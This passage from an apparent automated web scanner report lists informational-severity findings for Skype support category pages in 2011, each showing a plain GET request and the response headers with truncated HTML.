...[SNIP]...

24.56. https://support.skype.com/en-us/category/PSP/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/PSP/

Request

GET /en-us/category/PSP/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:36:21 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 52647


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...

24.57. https://support.skype.com/en-us/category/PUBLIC_CHATS/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/PUBLIC_CHATS/

Request

GET /en-us/category/PUBLIC_CHATS/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:36:27 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 50061


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...

24.58. https://support.skype.com/en-us/category/SCREEN_SHARING/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/SCREEN_SHARING/

Request

GET /en-us/category/SCREEN_SHARING/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:34:33 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 46643


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...

24.59. https://support.skype.com/en-us/category/SC_CONFIG/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/SC_CONFIG/

Request

GET /en-us/category/SC_CONFIG/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:36:12 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 52986


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...

24.60. https://support.skype.com/en-us/category/SC_GETTING_STARTED/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/SC_GETTING_STARTED/

Request

GET /en-us/category/SC_GETTING_STARTED/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:36:10 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 51199


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...

24.61. https://support.skype.com/en-us/category/SC_PBX/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/SC_PBX/

Request

GET /en-us/category/SC_PBX/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:36:14 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 50744


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...

24.62. https://support.skype.com/en-us/category/SC_REQUIREMENTS/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/SC_REQUIREMENTS/

Request

GET /en-us/category/SC_REQUIREMENTS/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:36:12 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 50291


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...

24.63. https://support.skype.com/en-us/category/SC_TROUBLE/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/SC_TROUBLE/

Request

GET /en-us/category/SC_TROUBLE/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:36:20 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 52078


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...

24.64. https://support.skype.com/en-us/category/SEND_MONEY/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/SEND_MONEY/

Request

GET /en-us/category/SEND_MONEY/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:36:30 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 50047


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...

24.65. https://support.skype.com/en-us/category/SKYPEFIND/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/SKYPEFIND/

Request

GET /en-us/category/SKYPEFIND/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:36:21 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 52613


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...

24.66. https://support.skype.com/en-us/category/SKYPE_2_8_MAC_OR_BELOW/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/SKYPE_2_8_MAC_OR_BELOW/

Request

GET /en-us/category/SKYPE_2_8_MAC_OR_BELOW/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:36:26 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 51705


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...

24.67. https://support.skype.com/en-us/category/SKYPE_4_2_OR_BELOW/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/SKYPE_4_2_OR_BELOW/

Request

GET /en-us/category/SKYPE_4_2_OR_BELOW/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:36:24 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 56221


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...

24.68. https://support.skype.com/en-us/category/SKYPE_ACCESS/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/SKYPE_ACCESS/

Request

GET /en-us/category/SKYPE_ACCESS/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:36:21 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 53055


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...

24.69. https://support.skype.com/en-us/category/SKYPE_API/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/SKYPE_API/

Request

GET /en-us/category/SKYPE_API/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:36:21 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 54676


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...

24.70. https://support.skype.com/en-us/category/SKYPE_CALLS_FROM_BROWSERS/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/SKYPE_CALLS_FROM_BROWSERS/

Request

GET /en-us/category/SKYPE_CALLS_FROM_BROWSERS/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:36:21 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 52146


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...

24.71. https://support.skype.com/en-us/category/SKYPE_FOR_ANDROID/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/SKYPE_FOR_ANDROID/

Request

GET /en-us/category/SKYPE_FOR_ANDROID/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:35:33 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 53344


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...

24.72. https://support.skype.com/en-us/category/SKYPE_FOR_IPHONE/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/SKYPE_FOR_IPHONE/

Request

GET /en-us/category/SKYPE_FOR_IPHONE/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:35:33 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 53132


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...

24.73. https://support.skype.com/en-us/category/SKYPE_FOR_LINUX/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/SKYPE_FOR_LINUX/

Request

GET /en-us/category/SKYPE_FOR_LINUX/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:36:22 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 55439


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...

24.74. https://support.skype.com/en-us/category/SKYPE_FOR_MAC_OS_X/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/SKYPE_FOR_MAC_OS_X/

Request

GET /en-us/category/SKYPE_FOR_MAC_OS_X/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:36:21 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 56496


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...

24.75. https://support.skype.com/en-us/category/SKYPE_FOR_NOKIA_N800N810/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/SKYPE_FOR_NOKIA_N800N810/

Request

GET /en-us/category/SKYPE_FOR_NOKIA_N800N810/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:36:00 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 50289


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...

24.76. https://support.skype.com/en-us/category/SKYPE_FOR_NOKIA_N900/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/SKYPE_FOR_NOKIA_N900/

Request

GET /en-us/category/SKYPE_FOR_NOKIA_N900/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:35:59 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 48832


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...

24.77. https://support.skype.com/en-us/category/SKYPE_FOR_SYMBIAN/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/SKYPE_FOR_SYMBIAN/

Request

GET /en-us/category/SKYPE_FOR_SYMBIAN/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:35:35 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 52607


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...

24.78. https://support.skype.com/en-us/category/SKYPE_FOR_WEBOS/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/SKYPE_FOR_WEBOS/

Request

GET /en-us/category/SKYPE_FOR_WEBOS/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:36:03 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 48305


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...

24.79. https://support.skype.com/en-us/category/SKYPE_LITE/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/SKYPE_LITE/

Request

GET /en-us/category/SKYPE_LITE/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:36:03 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 50458


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...

24.80. https://support.skype.com/en-us/category/SKYPE_MANAGER_FOR_MEMBERS/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/SKYPE_MANAGER_FOR_MEMBERS/

Request

GET /en-us/category/SKYPE_MANAGER_FOR_MEMBERS/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:36:09 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 47724


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...

24.81. https://support.skype.com/en-us/category/SKYPE_ME/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/SKYPE_ME/

Request

GET /en-us/category/SKYPE_ME/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:36:31 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 50049


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...

24.82. https://support.skype.com/en-us/category/SKYPE_MOBILE_FOR_VERIZON/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/SKYPE_MOBILE_FOR_VERIZON/

Request

GET /en-us/category/SKYPE_MOBILE_FOR_VERIZON/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:35:36 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 53645


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...

24.83. https://support.skype.com/en-us/category/SKYPE_ON_AU/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/SKYPE_ON_AU/

Request

GET /en-us/category/SKYPE_ON_AU/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:35:37 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 53353


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...

24.84. https://support.skype.com/en-us/category/SKYPE_ON_TELUS/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/SKYPE_ON_TELUS/

Request

GET /en-us/category/SKYPE_ON_TELUS/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:35:56 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 49395


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...

24.85. https://support.skype.com/en-us/category/SKYPE_ON_THREE/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/SKYPE_ON_THREE/

Request

GET /en-us/category/SKYPE_ON_THREE/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:35:35 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 51355


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...

24.86. https://support.skype.com/en-us/category/SKYPE_ON_YOUR_TV/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/SKYPE_ON_YOUR_TV/

Request

GET /en-us/category/SKYPE_ON_YOUR_TV/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:36:21 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 53773


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...

24.87. https://support.skype.com/en-us/category/SKYPE_PRIME/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/SKYPE_PRIME/

Request

GET /en-us/category/SKYPE_PRIME/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:36:31 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 50057


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...

24.88. https://support.skype.com/en-us/category/SKYPE_PRO/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/SKYPE_PRO/

Request

GET /en-us/category/SKYPE_PRO/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:36:32 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 50434


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...

24.89. https://support.skype.com/en-us/category/SKYPE_SMS/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/SKYPE_SMS/

Request

GET /en-us/category/SKYPE_SMS/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:35:06 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 49270


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...

24.90. https://support.skype.com/en-us/category/SKYPE_TOOLBARS/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/SKYPE_TOOLBARS/

Request

GET /en-us/category/SKYPE_TOOLBARS/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:36:21 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 51162


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...

24.91. https://support.skype.com/en-us/category/SKYPE_TO_GO/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/SKYPE_TO_GO/

Request

GET /en-us/category/SKYPE_TO_GO/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:36:21 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 55303


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...

24.92. https://support.skype.com/en-us/category/SM_ACCOUNT_DETAILS/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/SM_ACCOUNT_DETAILS/

Request

GET /en-us/category/SM_ACCOUNT_DETAILS/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:36:08 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 48679


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...

24.93. https://support.skype.com/en-us/category/SM_FEATURES/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/SM_FEATURES/

Request

